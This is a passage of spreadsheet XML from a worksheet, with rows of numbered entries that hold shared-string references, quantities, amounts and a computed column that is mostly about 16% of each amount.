        <v>913.6448</v>
      </c>
      <c r="K1418" s="16"/>
    </row>
    <row r="1419" spans="2:11">
      <c r="B1419" s="9">
        <v>1453</v>
      </c>
      <c r="C1419" s="238" t="s">
        <v>8564</v>
      </c>
      <c r="D1419" s="238" t="s">
        <v>6809</v>
      </c>
      <c r="E1419" s="238" t="s">
        <v>6810</v>
      </c>
      <c r="F1419" s="238" t="s">
        <v>8565</v>
      </c>
      <c r="G1419" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1419" s="10">
        <v>220</v>
      </c>
      <c r="I1419" s="14">
        <v>4309.67</v>
      </c>
      <c r="J1419" s="15">
        <v>689.568</v>
      </c>
      <c r="K1419" s="16"/>
    </row>
    <row r="1420" spans="2:11">
      <c r="B1420" s="9">
        <v>1454</v>
      </c>
      <c r="C1420" s="238" t="s">
        <v>8566</v>
      </c>
      <c r="D1420" s="238" t="s">
        <v>8567</v>
      </c>
      <c r="E1420" s="238" t="s">
        <v>6224</v>
      </c>
      <c r="F1420" s="238" t="s">
        <v>8568</v>
      </c>
      <c r="G1420" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1420" s="10">
        <v>13</v>
      </c>
      <c r="I1420" s="14">
        <v>678.78</v>
      </c>
      <c r="J1420" s="15">
        <v>108.5968</v>
      </c>
      <c r="K1420" s="16"/>
    </row>
    <row r="1421" spans="2:11">
      <c r="B1421" s="9">
        <v>1455</v>
      </c>
      <c r="C1421" s="238" t="s">
        <v>8569</v>
      </c>
      <c r="D1421" s="238" t="s">
        <v>7141</v>
      </c>
      <c r="E1421" s="238" t="s">
        <v>8570</v>
      </c>
      <c r="F1421" s="9"/>
      <c r="G1421" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1421" s="10">
        <v>12</v>
      </c>
      <c r="I1421" s="14">
        <v>287.18</v>
      </c>
      <c r="J1421" s="15">
        <v>45.9456</v>
      </c>
      <c r="K1421" s="16"/>
    </row>
    <row r="1422" spans="2:11">
      <c r="B1422" s="9">
        <v>1456</v>
      </c>
      <c r="C1422" s="238" t="s">
        <v>8571</v>
      </c>
      <c r="D1422" s="238" t="s">
        <v>8572</v>
      </c>
      <c r="E1422" s="238" t="s">
        <v>5146</v>
      </c>
      <c r="F1422" s="238" t="s">
        <v>8573</v>
      </c>
      <c r="G1422" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1422" s="10">
        <v>2</v>
      </c>
      <c r="I1422" s="14">
        <v>119.74</v>
      </c>
      <c r="J1422" s="15">
        <v>19.1584</v>
      </c>
      <c r="K1422" s="16"/>
    </row>
    <row r="1423" spans="2:11">
      <c r="B1423" s="9">
        <v>1457</v>
      </c>
      <c r="C1423" s="238" t="s">
        <v>8574</v>
      </c>
      <c r="D1423" s="238" t="s">
        <v>8575</v>
      </c>
      <c r="E1423" s="238" t="s">
        <v>8576</v>
      </c>
      <c r="F1423" s="238" t="s">
        <v>8577</v>
      </c>
      <c r="G1423" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1423" s="10">
        <v>2</v>
      </c>
      <c r="I1423" s="14">
        <v>326.49</v>
      </c>
      <c r="J1423" s="15">
        <v>52.24</v>
      </c>
      <c r="K1423" s="16"/>
    </row>
    <row r="1424" spans="2:11">
      <c r="B1424" s="9">
        <v>1458</v>
      </c>
      <c r="C1424" s="238" t="s">
        <v>8578</v>
      </c>
      <c r="D1424" s="238" t="s">
        <v>8579</v>
      </c>
      <c r="E1424" s="238" t="s">
        <v>8580</v>
      </c>
      <c r="F1424" s="9"/>
      <c r="G1424" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1424" s="10">
        <v>2</v>
      </c>
      <c r="I1424" s="14">
        <v>854.7</v>
      </c>
      <c r="J1424" s="15">
        <v>136.752</v>
      </c>
      <c r="K1424" s="16"/>
    </row>
    <row r="1425" spans="2:11">
      <c r="B1425" s="9">
        <v>1459</v>
      </c>
      <c r="C1425" s="238" t="s">
        <v>8581</v>
      </c>
      <c r="D1425" s="238" t="s">
        <v>6795</v>
      </c>
      <c r="E1425" s="238" t="s">
        <v>8582</v>
      </c>
      <c r="F1425" s="238" t="s">
        <v>8583</v>
      </c>
      <c r="G1425" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1425" s="10">
        <v>3</v>
      </c>
      <c r="I1425" s="14">
        <v>1282.05</v>
      </c>
      <c r="J1425" s="15">
        <v>205.128</v>
      </c>
      <c r="K1425" s="16"/>
    </row>
    <row r="1426" spans="2:11">
      <c r="B1426" s="9">
        <v>1460</v>
      </c>
      <c r="C1426" s="238" t="s">
        <v>8584</v>
      </c>
      <c r="D1426" s="238" t="s">
        <v>8585</v>
      </c>
      <c r="E1426" s="238" t="s">
        <v>5013</v>
      </c>
      <c r="F1426" s="238" t="s">
        <v>8586</v>
      </c>
      <c r="G1426" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1426" s="10">
        <v>3</v>
      </c>
      <c r="I1426" s="14">
        <v>152.21</v>
      </c>
      <c r="J1426" s="15">
        <v>24.3552</v>
      </c>
      <c r="K1426" s="16"/>
    </row>
    <row r="1427" spans="2:11">
      <c r="B1427" s="9">
        <v>1461</v>
      </c>
      <c r="C1427" s="238" t="s">
        <v>8587</v>
      </c>
      <c r="D1427" s="238" t="s">
        <v>8588</v>
      </c>
      <c r="E1427" s="238" t="s">
        <v>8589</v>
      </c>
      <c r="F1427" s="238" t="s">
        <v>8586</v>
      </c>
      <c r="G1427" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1427" s="10">
        <v>2</v>
      </c>
      <c r="I1427" s="14">
        <v>1367.52</v>
      </c>
      <c r="J1427" s="15">
        <v>218.8032</v>
      </c>
      <c r="K1427" s="16"/>
    </row>
    <row r="1428" spans="2:11">
      <c r="B1428" s="9">
        <v>1462</v>
      </c>
      <c r="C1428" s="238" t="s">
        <v>8590</v>
      </c>
      <c r="D1428" s="238" t="s">
        <v>8409</v>
      </c>
      <c r="E1428" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1428" s="238" t="s">
        <v>494</v>
      </c>
      <c r="G1428" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1428" s="10">
        <v>4</v>
      </c>
      <c r="I1428" s="14">
        <v>2222.23</v>
      </c>
      <c r="J1428" s="15">
        <v>355.5584</v>
      </c>
      <c r="K1428" s="16"/>
    </row>
    <row r="1429" spans="2:11">
      <c r="B1429" s="9">
        <v>1463</v>
      </c>
      <c r="C1429" s="238" t="s">
        <v>8591</v>
      </c>
      <c r="D1429" s="238" t="s">
        <v>8592</v>
      </c>
      <c r="E1429" s="238" t="s">
        <v>5017</v>
      </c>
      <c r="F1429" s="238" t="s">
        <v>8586</v>
      </c>
      <c r="G1429" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1429" s="10">
        <v>1</v>
      </c>
      <c r="I1429" s="14">
        <v>32</v>
      </c>
      <c r="J1429" s="15">
        <v>5.12</v>
      </c>
      <c r="K1429" s="16"/>
    </row>
    <row r="1430" spans="2:11">
      <c r="B1430" s="9">
        <v>1464</v>
      </c>
      <c r="C1430" s="238" t="s">
        <v>8593</v>
      </c>
      <c r="D1430" s="238" t="s">
        <v>8594</v>
      </c>
      <c r="E1430" s="238" t="s">
        <v>4939</v>
      </c>
      <c r="F1430" s="238" t="s">
        <v>546</v>
      </c>
      <c r="G1430" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1430" s="10">
        <v>1</v>
      </c>
      <c r="I1430" s="14">
        <v>336.75</v>
      </c>
      <c r="J1430" s="15">
        <v>53.88</v>
      </c>
      <c r="K1430" s="16"/>
    </row>
    <row r="1431" spans="2:11">
      <c r="B1431" s="9">
        <v>1465</v>
      </c>
      <c r="C1431" s="238" t="s">
        <v>8595</v>
      </c>
      <c r="D1431" s="238" t="s">
        <v>8596</v>
      </c>
      <c r="E1431" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F1431" s="238" t="s">
        <v>546</v>
      </c>
      <c r="G1431" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1431" s="10">
        <v>66</v>
      </c>
      <c r="I1431" s="14">
        <v>866.8</v>
      </c>
      <c r="J1431" s="15">
        <v>138.6528</v>
      </c>
      <c r="K1431" s="16"/>
    </row>
    <row r="1432" spans="2:11">
      <c r="B1432" s="9">
        <v>1466</v>
      </c>
      <c r="C1432" s="238" t="s">
        <v>8597</v>
      </c>
      <c r="D1432" s="238" t="s">
        <v>8598</v>
      </c>
      <c r="E1432" s="238" t="s">
        <v>8599</v>
      </c>
      <c r="F1432" s="238" t="s">
        <v>546</v>
      </c>
      <c r="G1432" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1432" s="10">
        <v>11</v>
      </c>
      <c r="I1432" s="14">
        <v>1698.46</v>
      </c>
      <c r="J1432" s="15">
        <v>271.7616</v>
      </c>
      <c r="K1432" s="16"/>
    </row>
    <row r="1433" spans="2:11">
      <c r="B1433" s="9">
        <v>1467</v>
      </c>
      <c r="C1433" s="238" t="s">
        <v>8600</v>
      </c>
      <c r="D1433" s="238" t="s">
        <v>8601</v>
      </c>
      <c r="E1433" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F1433" s="238" t="s">
        <v>546</v>
      </c>
      <c r="G1433" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1433" s="10">
        <v>2</v>
      </c>
      <c r="I1433" s="14">
        <v>478.57</v>
      </c>
      <c r="J1433" s="15">
        <v>76.5728</v>
      </c>
      <c r="K1433" s="16"/>
    </row>
    <row r="1434" spans="2:11">
      <c r="B1434" s="9">
        <v>1468</v>
      </c>
      <c r="C1434" s="238" t="s">
        <v>8602</v>
      </c>
      <c r="D1434" s="238" t="s">
        <v>8603</v>
      </c>
      <c r="E1434" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F1434" s="238" t="s">
        <v>546</v>
      </c>
      <c r="G1434" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1434" s="10">
        <v>3</v>
      </c>
      <c r="I1434" s="14">
        <v>2018.15</v>
      </c>
      <c r="J1434" s="15">
        <v>322.9056</v>
      </c>
      <c r="K1434" s="16"/>
    </row>
    <row r="1435" spans="2:11">
      <c r="B1435" s="9">
        <v>1469</v>
      </c>
      <c r="C1435" s="238" t="s">
        <v>8604</v>
      </c>
      <c r="D1435" s="238" t="s">
        <v>8605</v>
      </c>
      <c r="E1435" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F1435" s="238" t="s">
        <v>546</v>
      </c>
      <c r="G1435" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1435" s="10">
        <v>2</v>
      </c>
      <c r="I1435" s="14">
        <v>342.04</v>
      </c>
      <c r="J1435" s="15">
        <v>54.7264</v>
      </c>
      <c r="K1435" s="16"/>
    </row>
    <row r="1436" spans="2:11">
      <c r="B1436" s="9">
        <v>1470</v>
      </c>
      <c r="C1436" s="238" t="s">
        <v>8606</v>
      </c>
      <c r="D1436" s="238" t="s">
        <v>8607</v>
      </c>
      <c r="E1436" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F1436" s="238" t="s">
        <v>8608</v>
      </c>
      <c r="G1436" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1436" s="10">
        <v>2</v>
      </c>
      <c r="I1436" s="14">
        <v>464.46</v>
      </c>
      <c r="J1436" s="15">
        <v>74.3136</v>
      </c>
      <c r="K1436" s="16"/>
    </row>
    <row r="1437" spans="2:11">
      <c r="B1437" s="9">
        <v>1471</v>
      </c>
      <c r="C1437" s="238" t="s">
        <v>8609</v>
      </c>
      <c r="D1437" s="238" t="s">
        <v>8610</v>
      </c>
      <c r="E1437" s="238" t="s">
        <v>8599</v>
      </c>
      <c r="F1437" s="238" t="s">
        <v>8608</v>
      </c>
      <c r="G1437" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1437" s="10">
        <v>1</v>
      </c>
      <c r="I1437" s="14">
        <v>192.17</v>
      </c>
      <c r="J1437" s="15">
        <v>30.7472</v>
      </c>
      <c r="K1437" s="16"/>
    </row>
    <row r="1438" spans="2:11">
      <c r="B1438" s="9">
        <v>1472</v>
      </c>
      <c r="C1438" s="238" t="s">
        <v>8611</v>
      </c>
      <c r="D1438" s="238" t="s">
        <v>8612</v>
      </c>
      <c r="E1438" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F1438" s="238" t="s">
        <v>8608</v>
      </c>
      <c r="G1438" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1438" s="10">
        <v>3</v>
      </c>
      <c r="I1438" s="14">
        <v>78.93</v>
      </c>
      <c r="J1438" s="15">
        <v>12.6288</v>
      </c>
      <c r="K1438" s="16"/>
    </row>
    <row r="1439" spans="2:11">
      <c r="B1439" s="9">
        <v>1473</v>
      </c>
      <c r="C1439" s="238" t="s">
        <v>8613</v>
      </c>
      <c r="D1439" s="238" t="s">
        <v>8614</v>
      </c>
      <c r="E1439" s="238" t="s">
        <v>8615</v>
      </c>
      <c r="F1439" s="238" t="s">
        <v>8616</v>
      </c>
      <c r="G1439" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1439" s="10">
        <v>1</v>
      </c>
      <c r="I1439" s="14">
        <v>27.35</v>
      </c>
      <c r="J1439" s="15">
        <v>4.376</v>
      </c>
      <c r="K1439" s="16"/>
    </row>
    <row r="1440" spans="2:11">
      <c r="B1440" s="9">
        <v>1474</v>
      </c>
      <c r="C1440" s="238" t="s">
        <v>8617</v>
      </c>
      <c r="D1440" s="238" t="s">
        <v>8618</v>
      </c>
      <c r="E1440" s="238" t="s">
        <v>8619</v>
      </c>
      <c r="F1440" s="238" t="s">
        <v>8620</v>
      </c>
      <c r="G1440" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1440" s="10">
        <v>1</v>
      </c>
      <c r="I1440" s="14">
        <v>168</v>
      </c>
      <c r="J1440" s="15">
        <v>26.88</v>
      </c>
      <c r="K1440" s="16"/>
    </row>
    <row r="1441" spans="2:11">
      <c r="B1441" s="9">
        <v>1475</v>
      </c>
      <c r="C1441" s="238" t="s">
        <v>8621</v>
      </c>
      <c r="D1441" s="238" t="s">
        <v>8622</v>
      </c>
      <c r="E1441" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F1441" s="238" t="s">
        <v>8623</v>
      </c>
      <c r="G1441" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1441" s="10">
        <v>2</v>
      </c>
      <c r="I1441" s="14">
        <v>67.5</v>
      </c>
      <c r="J1441" s="15">
        <v>27</v>
      </c>
      <c r="K1441" s="16"/>
    </row>
    <row r="1442" spans="2:11">
      <c r="B1442" s="9">
        <v>1476</v>
      </c>
      <c r="C1442" s="238" t="s">
        <v>8624</v>
      </c>
      <c r="D1442" s="238" t="s">
        <v>8625</v>
      </c>
      <c r="E1442" s="238" t="s">
        <v>8626</v>
      </c>
      <c r="F1442" s="238" t="s">
        <v>8627</v>
      </c>
      <c r="G1442" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1442" s="10">
        <v>1</v>
      </c>
      <c r="I1442" s="14">
        <v>1794.87</v>
      </c>
      <c r="J1442" s="15">
        <v>287.1792</v>
      </c>
      <c r="K1442" s="16"/>
    </row>
    <row r="1443" spans="2:11">
      <c r="B1443" s="9">
        <v>1477</v>
      </c>
      <c r="C1443" s="238" t="s">
        <v>8628</v>
      </c>
      <c r="D1443" s="238" t="s">
        <v>8629</v>
      </c>
      <c r="E1443" s="238" t="s">
        <v>8630</v>
      </c>
      <c r="F1443" s="9"/>
      <c r="G1443" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1443" s="10">
        <v>3</v>
      </c>
      <c r="I1443" s="14">
        <v>807.69</v>
      </c>
      <c r="J1443" s="15">
        <v>129.2304</v>
      </c>
      <c r="K1443" s="16"/>
    </row>
    <row r="1444" spans="2:11">
      <c r="B1444" s="9">
        <v>1478</v>
      </c>
      <c r="C1444" s="238" t="s">
        <v>8631</v>
      </c>
      <c r="D1444" s="238" t="s">
        <v>5858</v>
      </c>
      <c r="E1444" s="238" t="s">
        <v>6672</v>
      </c>
      <c r="F1444" s="9"/>
      <c r="G1444" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1444" s="10">
        <v>3</v>
      </c>
      <c r="I1444" s="14">
        <v>1153.77</v>
      </c>
      <c r="J1444" s="15">
        <v>184.6032</v>
      </c>
      <c r="K1444" s="16"/>
    </row>
    <row r="1445" spans="2:11">
      <c r="B1445" s="9">
        <v>1479</v>
      </c>
      <c r="C1445" s="238" t="s">
        <v>8632</v>
      </c>
      <c r="D1445" s="238" t="s">
        <v>8633</v>
      </c>
      <c r="E1445" s="238" t="s">
        <v>6726</v>
      </c>
      <c r="F1445" s="238" t="s">
        <v>8634</v>
      </c>
      <c r="G1445" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1445" s="10">
        <v>3</v>
      </c>
      <c r="I1445" s="14">
        <v>8038.46</v>
      </c>
      <c r="J1445" s="15">
        <v>1286.1552</v>
      </c>
      <c r="K1445" s="16"/>
    </row>
    <row r="1446" spans="2:11">
      <c r="B1446" s="9">
        <v>1480</v>
      </c>
      <c r="C1446" s="238" t="s">
        <v>8635</v>
      </c>
      <c r="D1446" s="238" t="s">
        <v>8636</v>
      </c>
      <c r="E1446" s="238" t="s">
        <v>8147</v>
      </c>
      <c r="F1446" s="9"/>
      <c r="G1446" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1446" s="10">
        <v>1</v>
      </c>
      <c r="I1446" s="14">
        <v>162.39</v>
      </c>
      <c r="J1446" s="15">
        <v>25.9824</v>
      </c>
      <c r="K1446" s="16"/>
    </row>
    <row r="1447" spans="2:11">
      <c r="B1447" s="9">
        <v>1481</v>
      </c>
      <c r="C1447" s="238" t="s">
        <v>8637</v>
      </c>
      <c r="D1447" s="238" t="s">
        <v>8638</v>
      </c>
      <c r="E1447" s="238" t="s">
        <v>6224</v>
      </c>
      <c r="F1447" s="238" t="s">
        <v>8639</v>
      </c>
      <c r="G1447" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1447" s="10">
        <v>51</v>
      </c>
      <c r="I1447" s="14">
        <v>6383.94</v>
      </c>
      <c r="J1447" s="15">
        <v>1021.4688</v>
      </c>
      <c r="K1447" s="16"/>
    </row>
    <row r="1448" spans="2:11">
      <c r="B1448" s="9">
        <v>1482</v>
      </c>
      <c r="C1448" s="238" t="s">
        <v>8640</v>
      </c>
      <c r="D1448" s="238" t="s">
        <v>8641</v>
      </c>
      <c r="E1448" s="238" t="s">
        <v>8642</v>
      </c>
      <c r="F1448" s="238" t="s">
        <v>8643</v>
      </c>
      <c r="G1448" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1448" s="10">
        <v>199</v>
      </c>
      <c r="I1448" s="14">
        <v>5051.22</v>
      </c>
      <c r="J1448" s="15">
        <v>808.0992</v>
      </c>
      <c r="K1448" s="16"/>
    </row>
    <row r="1449" spans="2:11">
      <c r="B1449" s="9">
        <v>1483</v>
      </c>
      <c r="C1449" s="238" t="s">
        <v>8644</v>
      </c>
      <c r="D1449" s="238" t="s">
        <v>8645</v>
      </c>
      <c r="E1449" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1449" s="238" t="s">
        <v>8646</v>
      </c>
      <c r="G1449" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1449" s="10">
        <v>19</v>
      </c>
      <c r="I1449" s="14">
        <v>1606</v>
      </c>
      <c r="J1449" s="15">
        <v>256.9712</v>
      </c>
      <c r="K1449" s="16"/>
    </row>
    <row r="1450" spans="2:11">
      <c r="B1450" s="9">
        <v>1484</v>
      </c>
      <c r="C1450" s="238" t="s">
        <v>8647</v>
      </c>
      <c r="D1450" s="238" t="s">
        <v>8648</v>
      </c>
      <c r="E1450" s="238" t="s">
        <v>8570</v>
      </c>
      <c r="F1450" s="238" t="s">
        <v>8649</v>
      </c>
      <c r="G1450" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1450" s="10">
        <v>104</v>
      </c>
      <c r="I1450" s="14">
        <v>6044.41</v>
      </c>
      <c r="J1450" s="15">
        <v>967.1168</v>
      </c>
      <c r="K1450" s="16"/>
    </row>
    <row r="1451" spans="2:11">
      <c r="B1451" s="9">
        <v>1485</v>
      </c>
      <c r="C1451" s="238" t="s">
        <v>8650</v>
      </c>
      <c r="D1451" s="238" t="s">
        <v>8651</v>
      </c>
      <c r="E1451" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1451" s="238" t="s">
        <v>8652</v>
      </c>
      <c r="G1451" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1451" s="10">
        <v>30</v>
      </c>
      <c r="I1451" s="14">
        <v>678</v>
      </c>
      <c r="J1451" s="15">
        <v>108.48</v>
      </c>
      <c r="K1451" s="16"/>
    </row>
    <row r="1452" spans="2:11">
      <c r="B1452" s="9">
        <v>1486</v>
      </c>
      <c r="C1452" s="238" t="s">
        <v>8653</v>
      </c>
      <c r="D1452" s="238" t="s">
        <v>8654</v>
      </c>
      <c r="E1452" s="238" t="s">
        <v>8655</v>
      </c>
      <c r="F1452" s="238" t="s">
        <v>8656</v>
      </c>
      <c r="G1452" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1452" s="10">
        <v>36</v>
      </c>
      <c r="I1452" s="14">
        <v>2726.86</v>
      </c>
      <c r="J1452" s="15">
        <v>436.32</v>
      </c>
      <c r="K1452" s="16"/>
    </row>
    <row r="1453" spans="2:11">
      <c r="B1453" s="9">
        <v>1487</v>
      </c>
      <c r="C1453" s="238" t="s">
        <v>8657</v>
      </c>
      <c r="D1453" s="238" t="s">
        <v>8658</v>
      </c>
      <c r="E1453" s="238" t="s">
        <v>8147</v>
      </c>
      <c r="F1453" s="238" t="s">
        <v>8659</v>
      </c>
      <c r="G1453" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1453" s="10">
        <v>7</v>
      </c>
      <c r="I1453" s="14">
        <v>1527.24</v>
      </c>
      <c r="J1453" s="15">
        <v>244.3616</v>
      </c>
      <c r="K1453" s="16"/>
    </row>
    <row r="1454" spans="2:11">
      <c r="B1454" s="9">
        <v>1488</v>
      </c>
      <c r="C1454" s="238" t="s">
        <v>8660</v>
      </c>
      <c r="D1454" s="238" t="s">
        <v>8661</v>
      </c>
      <c r="E1454" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F1454" s="238" t="s">
        <v>8662</v>
      </c>
      <c r="G1454" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1454" s="10">
        <v>7</v>
      </c>
      <c r="I1454" s="14">
        <v>864.58</v>
      </c>
      <c r="J1454" s="15">
        <v>138.3312</v>
      </c>
      <c r="K1454" s="16"/>
    </row>
    <row r="1455" spans="2:11">
      <c r="B1455" s="9">
        <v>1489</v>
      </c>
      <c r="C1455" s="238" t="s">
        <v>8663</v>
      </c>
      <c r="D1455" s="238" t="s">
        <v>8664</v>
      </c>
      <c r="E1455" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1455" s="238" t="s">
        <v>8665</v>
      </c>
      <c r="G1455" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1455" s="10">
        <v>3</v>
      </c>
      <c r="I1455" s="14">
        <v>72</v>
      </c>
      <c r="J1455" s="15">
        <v>11.52</v>
      </c>
      <c r="K1455" s="16"/>
    </row>
    <row r="1456" spans="2:11">
      <c r="B1456" s="9">
        <v>1490</v>
      </c>
      <c r="C1456" s="238" t="s">
        <v>8666</v>
      </c>
      <c r="D1456" s="238" t="s">
        <v>8667</v>
      </c>
      <c r="E1456" s="238" t="s">
        <v>8626</v>
      </c>
      <c r="F1456" s="238" t="s">
        <v>8668</v>
      </c>
      <c r="G1456" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1456" s="10">
        <v>1</v>
      </c>
      <c r="I1456" s="14">
        <v>40</v>
      </c>
      <c r="J1456" s="15">
        <v>6.4</v>
      </c>
      <c r="K1456" s="16"/>
    </row>
    <row r="1457" spans="2:11">
      <c r="B1457" s="9">
        <v>1491</v>
      </c>
      <c r="C1457" s="238" t="s">
        <v>8669</v>
      </c>
      <c r="D1457" s="238" t="s">
        <v>8670</v>
      </c>
      <c r="E1457" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F1457" s="238" t="s">
        <v>8671</v>
      </c>
      <c r="G1457" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1457" s="10">
        <v>143</v>
      </c>
      <c r="I1457" s="14">
        <v>5800.9</v>
      </c>
      <c r="J1457" s="15">
        <v>928.2416</v>
      </c>
      <c r="K1457" s="16"/>
    </row>
    <row r="1458" spans="2:11">
      <c r="B1458" s="9">
        <v>1492</v>
      </c>
      <c r="C1458" s="238" t="s">
        <v>8672</v>
      </c>
      <c r="D1458" s="238" t="s">
        <v>8673</v>
      </c>
      <c r="E1458" s="238" t="s">
        <v>8674</v>
      </c>
      <c r="F1458" s="238" t="s">
        <v>8675</v>
      </c>
      <c r="G1458" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1458" s="10">
        <v>4</v>
      </c>
      <c r="I1458" s="14">
        <v>626</v>
      </c>
      <c r="J1458" s="15">
        <v>100.16</v>
      </c>
      <c r="K1458" s="16"/>
    </row>
    <row r="1459" spans="2:11">
      <c r="B1459" s="9">
        <v>1493</v>
      </c>
      <c r="C1459" s="238" t="s">
        <v>8676</v>
      </c>
      <c r="D1459" s="238" t="s">
        <v>8677</v>
      </c>
      <c r="E1459" s="238" t="s">
        <v>4735</v>
      </c>
      <c r="F1459" s="238" t="s">
        <v>8678</v>
      </c>
      <c r="G1459" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1459" s="10">
        <v>1</v>
      </c>
      <c r="I1459" s="14">
        <v>2820.52</v>
      </c>
      <c r="J1459" s="15">
        <v>451.2832</v>
      </c>
      <c r="K1459" s="16"/>
    </row>
    <row r="1460" spans="2:11">
      <c r="B1460" s="9">
        <v>1494</v>
      </c>
      <c r="C1460" s="238" t="s">
        <v>8679</v>
      </c>
      <c r="D1460" s="238" t="s">
        <v>8680</v>
      </c>
      <c r="E1460" s="238" t="s">
        <v>5269</v>
      </c>
      <c r="F1460" s="238" t="s">
        <v>8681</v>
      </c>
      <c r="G1460" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1460" s="10">
        <v>430</v>
      </c>
      <c r="I1460" s="14">
        <v>425.93</v>
      </c>
      <c r="J1460" s="15">
        <v>68.112</v>
      </c>
      <c r="K1460" s="16"/>
    </row>
    <row r="1461" spans="2:11">
      <c r="B1461" s="9">
        <v>1495</v>
      </c>
      <c r="C1461" s="238" t="s">
        <v>8682</v>
      </c>
      <c r="D1461" s="238" t="s">
        <v>8683</v>
      </c>
      <c r="E1461" s="238" t="s">
        <v>5269</v>
      </c>
      <c r="F1461" s="238" t="s">
        <v>8684</v>
      </c>
      <c r="G1461" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1461" s="10">
        <v>76</v>
      </c>
      <c r="I1461" s="14">
        <v>21.9</v>
      </c>
      <c r="J1461" s="15">
        <v>3.5264</v>
      </c>
      <c r="K1461" s="16"/>
    </row>
    <row r="1462" spans="2:11">
      <c r="B1462" s="9">
        <v>1496</v>
      </c>
      <c r="C1462" s="238" t="s">
        <v>8685</v>
      </c>
      <c r="D1462" s="238" t="s">
        <v>8686</v>
      </c>
      <c r="E1462" s="238" t="s">
        <v>5269</v>
      </c>
      <c r="F1462" s="238" t="s">
        <v>8687</v>
      </c>
      <c r="G1462" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1462" s="10">
        <v>297</v>
      </c>
      <c r="I1462" s="14">
        <v>44.75</v>
      </c>
      <c r="J1462" s="15">
        <v>7.128</v>
      </c>
      <c r="K1462" s="16"/>
    </row>
    <row r="1463" spans="2:11">
      <c r="B1463" s="9">
        <v>1497</v>
      </c>
      <c r="C1463" s="238" t="s">
        <v>8688</v>
      </c>
      <c r="D1463" s="238" t="s">
        <v>8689</v>
      </c>
      <c r="E1463" s="238" t="s">
        <v>8690</v>
      </c>
      <c r="F1463" s="238" t="s">
        <v>8691</v>
      </c>
      <c r="G1463" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1463" s="10">
        <v>4</v>
      </c>
      <c r="I1463" s="14">
        <v>6150</v>
      </c>
      <c r="J1463" s="15">
        <v>2460</v>
      </c>
      <c r="K1463" s="16"/>
    </row>
    <row r="1464" spans="2:11">
      <c r="B1464" s="9">
        <v>1498</v>
      </c>
      <c r="C1464" s="238" t="s">
        <v>8692</v>
      </c>
      <c r="D1464" s="238" t="s">
        <v>8132</v>
      </c>
      <c r="E1464" s="238" t="s">
        <v>6985</v>
      </c>
      <c r="F1464" s="9"/>
      <c r="G1464" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1464" s="10">
        <v>1</v>
      </c>
      <c r="I1464" s="14">
        <v>113.53</v>
      </c>
      <c r="J1464" s="15">
        <v>45.412</v>
      </c>
      <c r="K1464" s="16"/>
    </row>
    <row r="1465" spans="2:11">
      <c r="B1465" s="9">
        <v>1499</v>
      </c>
      <c r="C1465" s="238" t="s">
        <v>8693</v>
      </c>
      <c r="D1465" s="238" t="s">
        <v>8694</v>
      </c>
      <c r="E1465" s="238" t="s">
        <v>4597</v>
      </c>
      <c r="F1465" s="238" t="s">
        <v>8695</v>
      </c>
      <c r="G1465" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1465" s="10">
        <v>1</v>
      </c>
      <c r="I1465" s="14">
        <v>239.32</v>
      </c>
      <c r="J1465" s="15">
        <v>38.2912</v>
      </c>
      <c r="K1465" s="16"/>
    </row>
    <row r="1466" spans="2:11">
      <c r="B1466" s="9">
        <v>1500</v>
      </c>
      <c r="C1466" s="238" t="s">
        <v>8696</v>
      </c>
